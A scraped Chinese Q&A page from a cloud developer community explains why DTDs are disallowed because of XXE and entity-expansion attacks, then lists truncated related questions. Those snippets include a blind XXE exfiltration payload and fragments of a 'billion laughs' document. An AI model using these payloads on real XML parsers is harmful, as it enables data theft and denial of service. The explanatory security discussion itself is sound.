内部DTD上禁止使用DTD,即使验证器说我的XML和DTD是正确的?
内部DTD上禁止使用DTD是一种安全措施,即使验证器认为XML和DTD是正确的,也应该遵守这个规定。禁止使用DTD可以防止潜在的安全漏洞和攻击,确保系统的稳定性和安全性。
DTD(Document Type Definition)是一种用于定义XML文档结构和元素约束的规范。然而,DTD存在一些安全风险,例如实体扩展攻击(Entity Expansion Attack)和外部实体注入攻击(External Entity Injection Attack)。为了防止这些安全问题,内部DTD上禁止使用DTD成为一种最佳实践。
禁止使用DTD的优势包括:
- 安全性增强:禁止使用DTD可以防止实体扩展攻击和外部实体注入攻击,保护系统免受潜在的安全漏洞和攻击。
- 性能提升:DTD的解析和验证过程可能会消耗大量的系统资源和时间。禁止使用DTD可以减少XML解析和验证的开销,提高系统的性能和响应速度。
- 简化开发:禁止使用DTD可以简化开发过程,减少对DTD的依赖性。开发人员可以更专注于业务逻辑的实现,提高开发效率。
尽管验证器可能认为XML和DTD是正确的,但仍然应该遵守内部DTD上禁止使用DTD的规定。在实际应用中,可以考虑使用其他替代方案,如XML Schema(XSD)或RELAX NG等,来定义和验证XML文档的结构和约束。
腾讯云提供了一系列与XML相关的产品和服务,如腾讯云API网关、腾讯云消息队列CMQ等,可以帮助开发人员在云环境中更安全、高效地处理和管理XML数据。具体产品介绍和相关链接请参考腾讯云官方网站。
相关·内容
以下是我的XML文件中的代码,包括似乎导致问题的内部DTD。<!DOCTYPE Movies[ <actor>Glenn Fleshler</actor>
</ca
浏览 27提问于2021-03-09得票数 1
我正在做一个网页,上面列出了一个数据库中的几个租用预订。我想我可能把自己逼到了一个角落。最初,我的每一行末尾都有3个单元格,每个单元格都包含一个由2或3个隐藏字段组成的小表单,并有一个按钮来“编辑”、“返回”或“取消”预订。因此,我不假思索地添加了一个围绕整个表的<form>,在每一行中添加了一个复选框,并在表的底部添加了一个提交按钮。
经过一些研究,我确信XHTML中不允许嵌套表单。但是,文档仍然以某种
浏览 1提问于2015-02-12得票数 2
回答已采纳
>和类似的声明,是否有方法使用模式(最好是XSD)让XML文档的验证失败?<?xml version="1.0"?>]>&lol9;被解析并扩展到10倍&a
浏览 3提问于2014-04-25得票数 0
回答已采纳
2回答
我有一个XML文件,CSS文件和DTD文件。我希望当我对dtd文件的引用无效时,即将zzz添加到xml文件中如下所示的名称中,当我尝试在google中打开时会引发错误。我没有搞错吗?如果我编辑dtd文件并将文本zzz添加到单词Body (如图所示),同样的情况也是如此--在打开xml文件时,它应该会给我一个错误。我漏掉了什么吗?
浏览 7提问于2014-02-19得票数 0
回答已采纳
一个正确的盲XXE有效载荷是:<!DOCTYPE r [<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">%param1;<r>&exfil;</r>
File stored o
浏览 0提问于2018-11-02得票数 1
我有以下xml片段: "http://ibatis.apache.org/dtd/sql-map
浏览 1提问于2009-09-23得票数 5
回答已采纳
3回答
我正在编写一个用于XML文件后处理的Java应用程序。这些xml文件来自语义Mediawiki的RDF-Export,因此它们具有rdf/xml语法。我的问题如下:当我读取xml文件时,文件中的所有实体都被解析为它们在Doctype中指定的值。例如,在Doctype中我有<!变成了
<swivt:Subject r
浏览 0提问于2011-07-28得票数 5
2回答
XML DTD验证失败
、、、、
我有一个带有外部DTD的XML文件...下面是DTD:<!ATTLIST dialogue name CDATA #IMPLIED><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE
浏览 2提问于2012-02-15得票数 1
回答已采纳
3回答
我尝试使用外部dtd文件中的实体。<!DOCTYPE log4j:configuration SYSTEM "log4j.dtd" >
log4j-entity.dtd</e
浏览 4提问于2013-01-17得票数 4
回答已采纳
我有一个API,其验证方案如下:<header><body></body>可以在不改变规则的情况下使用DTD实体吗?ENTITY foo "something cool">
<element
浏览 3提问于2014-05-30得票数 1
回答已采纳
1回答
如何在Ruby中解析DTD文件
、、、、
删除dtd文件中的无效标记和属性
我目前正在考虑从"“中复制不允许的属性和标记,并使用这些属性和标记来验证我的XHTML,但是我更愿意使用DTD作为我的源代码。Nokogiri类是一个Node类,用于保存一个
浏览 0提问于2014-07-12得票数 8
我有一个奇怪的问题,我必须解析XML文件来获取数据,当我解析文件:时,所有工作正常(文件被解析),但是当我尝试解析文件:时,我得到一个消息,程序找不到这个文件(在浏览器中,XML文件工作)。例外:
下面是完整的示例代码。private void start() thr
浏览 1提问于2014-03-25得票数 2
回答已采纳
xml version="1.0" ?><!ELEMENT list (bsinfo+)>]>
<bsinfo>
在我的项目中,我想验证XML是否包含DTD。目前,我使用Libxml解析器来解析<em
浏览 0提问于2016-01-24得票数 0
3回答
有哪些资源可用于验证DTD?我想说清楚:我不是在讨论针对DTD验证XML文档的问题。
我指的是确保DTD本身是有效的。
浏览 6提问于2013-09-24得票数 7
回答已采纳
1回答
我使用Sarissa将XML字符串转换为DOM文档对象。一切都正常,除了Sarissa完全忽略了我的DTD。不会注意到与DTD规则的偏差,也看不到任何有关未找到DTD的消息。我的XML开头是这样的:
<?xml version="1.0" standalone="no&quo
浏览 15提问于2011-05-06得票数 0
回答已采纳
我得到了一个启动Spring应用程序的org.xml.sax.SAXParseException。我一直在谷歌上疯狂地想办法弄清楚这件事。这就是我在Tomcat 8.0.30里得到的。org.springframework.context.support.AbstractApplicationContext.obtainFreshBeanFactory(AbstractApplicationContext.java:612)
plus a whole bunch mo
浏览 3提问于2017-09-03得票数 0
回答已采纳
2回答
有没有人能给我一个Java库,让我在html页面上执行XPath查询?我试着使用JAXP,但它总是给我一个奇怪的错误,我似乎无法修复(对于URL:,线程"main“java.io.IOException:服务器返回HTTP response code: 503 )。编辑// Create a new SAX Parser factory
SAXParserFactory factory = SAXParserFactory
浏览 0提问于2010-07-28得票数 0
回答已采纳
3回答
我不是java中的新成员,而是XML和DTD文件中的新成员。我有一个工具(我写过),可以将项目保存为XML。您可以从主项目创建应用程序,但我必须对照主项目检查应用程序的有效性。因此,对于每个主要项目,我都必须创建一个DTD文件以及XML文件。这样我就可以对照那个DTD文件检查应用程序(也是XML文件)。如何<e
浏览 5提问于2012-02-27得票数 2
2回答
我使用一个独立的.dtd文件作为我的自定义xml文件的doctype:<?xml version="1.0" encoding="UTF-8"?><names>
浏览 4提问于2009-04-06得票数 3
回答已采纳
经过几天的混乱,并尝试不同的库使用XSD验证XML文档(根据XSD,我100%肯定是有效的),我终于发现了org.w3c.dom.DocumentBuilder和org.w3c.dom.Document下面是我收到的许多验证错误之一:
元素'high_value_range‘的属性'API_Version’的</em
浏览 4提问于2016-08-04得票数 3
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储活动推荐
腾讯云开发者
